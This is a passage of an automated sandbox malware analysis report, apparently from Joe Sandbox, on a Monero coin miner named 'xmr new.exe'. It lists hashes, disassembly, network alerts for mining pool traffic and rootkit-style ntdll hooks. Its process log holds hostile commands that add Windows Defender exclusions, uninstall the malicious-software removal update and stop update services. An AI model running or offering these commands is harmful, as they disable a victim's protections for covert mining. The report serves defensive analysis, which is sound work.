                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\Temp\__PSScriptPolicyTest_pbmusxyo.sbb.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\Temp\__PSScriptPolicyTest_y20akbzr.35p.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\Temp\zhgmaxoaawxc.sys

                                                      Download File
                                                      Process:C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):14544
                                                      Entropy (8bit):6.2660301556221185
                                                      Encrypted:false
                                                      SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                      MD5:0C0195C48B6B8582FA6F6373032118DA
                                                      SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                      SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                      SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                      Joe Sandbox View:
                                                      • Filename: eth.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: hiwA7Blv7C.exe, Detection: malicious, Browse
                                                      • Filename: 5fr5gthkjdg71.exe, Detection: malicious, Browse
                                                      • Filename: aAcx14Rjtw.exe, Detection: malicious, Browse
                                                      • Filename: SharcHack.exe, Detection: malicious, Browse
                                                      • Filename: 0Ty.png.exe, Detection: malicious, Browse
                                                      • Filename: Qhx6a6VLAH.exe, Detection: malicious, Browse
                                                      • Filename: 88aext0k.exe, Detection: malicious, Browse
                                                      • Filename: gaozw40v.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                      Static File Info

                                                      General

                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Entropy (8bit):6.508687886623363
                                                      TrID:
                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                      • DOS Executable Generic (2002/1) 0.92%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:xmr new.exe
                                                      File size:5'471'744 bytes
                                                      MD5:7d6398ebfb82a24748617189bf4ad691
                                                      SHA1:6c96d0e343e1e84bf58670f1249c1694a2012f04
                                                      SHA256:d7cd81563e5b98b9a329286557de71186d3f8f364a46691aca253ca00e4c3ef2
                                                      SHA512:9aeb3da479b23880de94e0b283a562ce19a79c2b27cb819ddf8e149eca5673a42c659fff10ea2ea9036aedda6fef37b97ecbf37236dd22baf20eba1e6dda4b4a
                                                      SSDEEP:98304:HV6FhnwA7hlMJ3J08U0bG31vxEuYH2vGDx+PqvqKjZ9+OE9GuqBfp:16HLXuC8U0KFvxEf9D1SOZuqh
                                                      TLSH:1946231CD42659E3CC8086FD583BE47C204CE9C143A0F54EF7CD73A659A11EB6ABA16E
                                                      File Content Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d..._..f.........."...........R.....@..........@..............................T...........`........................................

                                                      File Icon

                                                      Icon Hash:00928e8e8686b000

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x140001140
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x140000000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x6693B25F [Sun Jul 14 11:11:27 2024 UTC]
                                                      TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                      CLR (.Net) Version:
                                                      OS Version Major:6
                                                      OS Version Minor:0
                                                      File Version Major:6
                                                      File Version Minor:0
                                                      Subsystem Version Major:6
                                                      Subsystem Version Minor:0
                                                      Import Hash:203d63d5d9a088e2d84cef737227986b

                                                      Entrypoint Preview

                                                      Instruction
                                                      dec eax
                                                      sub esp, 28h
                                                      dec eax
                                                      mov eax, dword ptr [0000AED5h]
                                                      mov dword ptr [eax], 00000001h
                                                      call 00007FAF70C80B1Fh
                                                      nop
                                                      nop
                                                      nop
                                                      dec eax
                                                      add esp, 28h
                                                      ret
                                                      nop
                                                      inc ecx
                                                      push edi
                                                      inc ecx
                                                      push esi
                                                      push esi
                                                      push edi
                                                      push ebx
                                                      dec eax
                                                      sub esp, 20h
                                                      dec eax
                                                      mov eax, dword ptr [00000030h]
                                                      dec eax
                                                      mov edi, dword ptr [eax+08h]
                                                      dec eax
                                                      mov esi, dword ptr [0000AEC9h]
                                                      xor eax, eax
                                                      dec eax
                                                      cmpxchg dword ptr [esi], edi
                                                      sete bl
                                                      je 00007FAF70C80B40h
                                                      dec eax
                                                      cmp edi, eax
                                                      je 00007FAF70C80B3Bh
                                                      dec esp
                                                      mov esi, dword ptr [0000D189h]
                                                      nop word ptr [eax+eax+00000000h]
                                                      mov ecx, 000003E8h
                                                      inc ecx
                                                      call esi
                                                      xor eax, eax
                                                      dec eax
                                                      cmpxchg dword ptr [esi], edi
                                                      sete bl
                                                      je 00007FAF70C80B17h
                                                      dec eax
                                                      cmp edi, eax
                                                      jne 00007FAF70C80AF9h
                                                      dec eax
                                                      mov edi, dword ptr [0000AE90h]
                                                      mov eax, dword ptr [edi]
                                                      cmp eax, 01h
                                                      jne 00007FAF70C80B1Eh
                                                      mov ecx, 0000001Fh
                                                      call 00007FAF70C8A8A4h
                                                      jmp 00007FAF70C80B39h
                                                      cmp dword ptr [edi], 00000000h
                                                      je 00007FAF70C80B1Bh
                                                      mov byte ptr [00538531h], 00000001h
                                                      jmp 00007FAF70C80B2Bh
                                                      mov dword ptr [edi], 00000001h
                                                      dec eax
                                                      mov ecx, dword ptr [0000AE7Ah]
                                                      dec eax
                                                      mov edx, dword ptr [0000AE7Bh]
                                                      call 00007FAF70C8A89Bh
                                                      mov eax, dword ptr [edi]
                                                      cmp eax, 01h
                                                      jne 00007FAF70C80B2Bh
                                                      dec eax
                                                      mov ecx, dword ptr [0000AE50h]

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xe0480x3c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x53c0000x18c.pdata
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x53f0000x80.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0xc0a00x28.rdata
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xc4100x138.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0xe1e80x160.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000xa0f60xa200be348e1197da186573828aa315fc4db2False0.48420621141975306data6.116855328972542IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0xc0000x27dc0x2800e31128bf99e88dedb7484f237316cda5False0.4818359375data4.794114525995956IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xf0000x52c0a80x52a800730dcd080a6eba578d494ef18bf563bbunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .pdata0x53c0000x18c0x200c6f0c6a1728e01804deb81d27e63a128False0.513671875data3.192886865202075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .00cfg0x53d0000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .tls0x53e0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .reloc0x53f0000x800x200ac63a5c750fa0a7b812d69f394edeba3False0.2421875data1.4604375773007994IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Imports

                                                      DLLImport
                                                      msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
                                                      KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2025-01-07T16:09:59.175553+01002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.94970880.240.16.678888TCP
                                                      2025-01-07T16:10:22.405902+01002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.9651881.1.1.153UDP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 7, 2025 16:10:22.419871092 CET497088888192.168.2.980.240.16.67
                                                      Jan 7, 2025 16:10:22.424715042 CET88884970880.240.16.67192.168.2.9
                                                      Jan 7, 2025 16:10:22.424802065 CET497088888192.168.2.980.240.16.67
                                                      Jan 7, 2025 16:10:22.424928904 CET497088888192.168.2.980.240.16.67
                                                      Jan 7, 2025 16:10:22.429735899 CET88884970880.240.16.67192.168.2.9
                                                      Jan 7, 2025 16:10:23.076263905 CET88884970880.240.16.67192.168.2.9
                                                      Jan 7, 2025 16:10:23.116621971 CET497088888192.168.2.980.240.16.67
                                                      Jan 7, 2025 16:10:41.846533060 CET88884970880.240.16.67192.168.2.9
                                                      Jan 7, 2025 16:10:41.898416042 CET497088888192.168.2.980.240.16.67
                                                      Jan 7, 2025 16:11:03.664282084 CET88884970880.240.16.67192.168.2.9
                                                      Jan 7, 2025 16:11:03.819396019 CET497088888192.168.2.980.240.16.67
                                                      Jan 7, 2025 16:11:25.713701010 CET88884970880.240.16.67192.168.2.9
                                                      Jan 7, 2025 16:11:25.835468054 CET497088888192.168.2.980.240.16.67
                                                      Jan 7, 2025 16:11:47.718444109 CET88884970880.240.16.67192.168.2.9
                                                      Jan 7, 2025 16:11:47.929195881 CET497088888192.168.2.980.240.16.67
                                                      Jan 7, 2025 16:12:01.109510899 CET88884970880.240.16.67192.168.2.9
                                                      Jan 7, 2025 16:12:01.241816998 CET497088888192.168.2.980.240.16.67
                                                      Jan 7, 2025 16:12:09.759366989 CET88884970880.240.16.67192.168.2.9
                                                      Jan 7, 2025 16:12:09.929368973 CET497088888192.168.2.980.240.16.67
                                                      Jan 7, 2025 16:12:31.696337938 CET88884970880.240.16.67192.168.2.9
                                                      Jan 7, 2025 16:12:31.741714001 CET497088888192.168.2.980.240.16.67

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 7, 2025 16:10:22.405901909 CET6518853192.168.2.91.1.1.1
                                                      Jan 7, 2025 16:10:22.413194895 CET53651881.1.1.1192.168.2.9
                                                      Jan 7, 2025 16:10:23.761193037 CET6259253192.168.2.91.1.1.1
                                                      Jan 7, 2025 16:10:23.791937113 CET53625921.1.1.1192.168.2.9
                                                      Jan 7, 2025 16:11:21.944704056 CET5982253192.168.2.91.1.1.1
                                                      Jan 7, 2025 16:11:21.975595951 CET53598221.1.1.1192.168.2.9
                                                      Jan 7, 2025 16:12:27.534051895 CET6140453192.168.2.91.1.1.1
                                                      Jan 7, 2025 16:12:27.565321922 CET53614041.1.1.1192.168.2.9

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jan 7, 2025 16:10:22.405901909 CET192.168.2.91.1.1.10x380Standard query (0)pool.hashvault.proA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 16:10:23.761193037 CET192.168.2.91.1.1.10x85d4Standard query (0)miners20002.comA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 16:11:21.944704056 CET192.168.2.91.1.1.10x99a5Standard query (0)miners20002.comA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 16:12:27.534051895 CET192.168.2.91.1.1.10x1b1dStandard query (0)miners20002.comA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jan 7, 2025 16:10:22.413194895 CET1.1.1.1192.168.2.90x380No error (0)pool.hashvault.pro80.240.16.67A (IP address)IN (0x0001)false
                                                      Jan 7, 2025 16:10:22.413194895 CET1.1.1.1192.168.2.90x380No error (0)pool.hashvault.pro192.248.189.11A (IP address)IN (0x0001)false
                                                      Jan 7, 2025 16:10:23.791937113 CET1.1.1.1192.168.2.90x85d4Name error (3)miners20002.comnonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 16:11:21.975595951 CET1.1.1.1192.168.2.90x99a5Name error (3)miners20002.comnonenoneA (IP address)IN (0x0001)false
                                                      Jan 7, 2025 16:12:27.565321922 CET1.1.1.1192.168.2.90x1b1dName error (3)miners20002.comnonenoneA (IP address)IN (0x0001)false

                                                      Code Manipulations

                                                      User Modules

                                                      Hook Summary

                                                      Function NameHook TypeActive in Processes
                                                      ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                      NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                      ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                      NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                      ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                      NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                      NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                      ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                      ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                      NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                      RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                      NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                      NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                      ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                      ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                                                      Processes

                                                      Process: explorer.exe, Module: ntdll.dll
                                                      Function NameHook TypeNew Data
                                                      ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                      ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                      NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                      ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                      Process: winlogon.exe, Module: ntdll.dll
                                                      Function NameHook TypeNew Data
                                                      ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                      ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                      NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                      ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:10:10:04
                                                      Start date:07/01/2025
                                                      Path:C:\Users\user\Desktop\xmr new.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\xmr new.exe"
                                                      Imagebase:0x7ff641dc0000
                                                      File size:5'471'744 bytes
                                                      MD5 hash:7D6398EBFB82A24748617189BF4AD691
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:10:10:04
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      Imagebase:0x7ff760310000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:10:10:04
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:10:10:16
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff7f4b70000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:10:10:16
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:10:10:16
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:10:10:16
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:10:10:16
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff621dd0000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:10
                                                      Start time:10:10:16
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:11
                                                      Start time:10:10:16
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:12
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:13
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:14
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop bits
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:15
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:16
                                                      Start time:10:10:17
                                                      Start date:07/01/2025
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                      Imagebase:0x7ff61f410000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
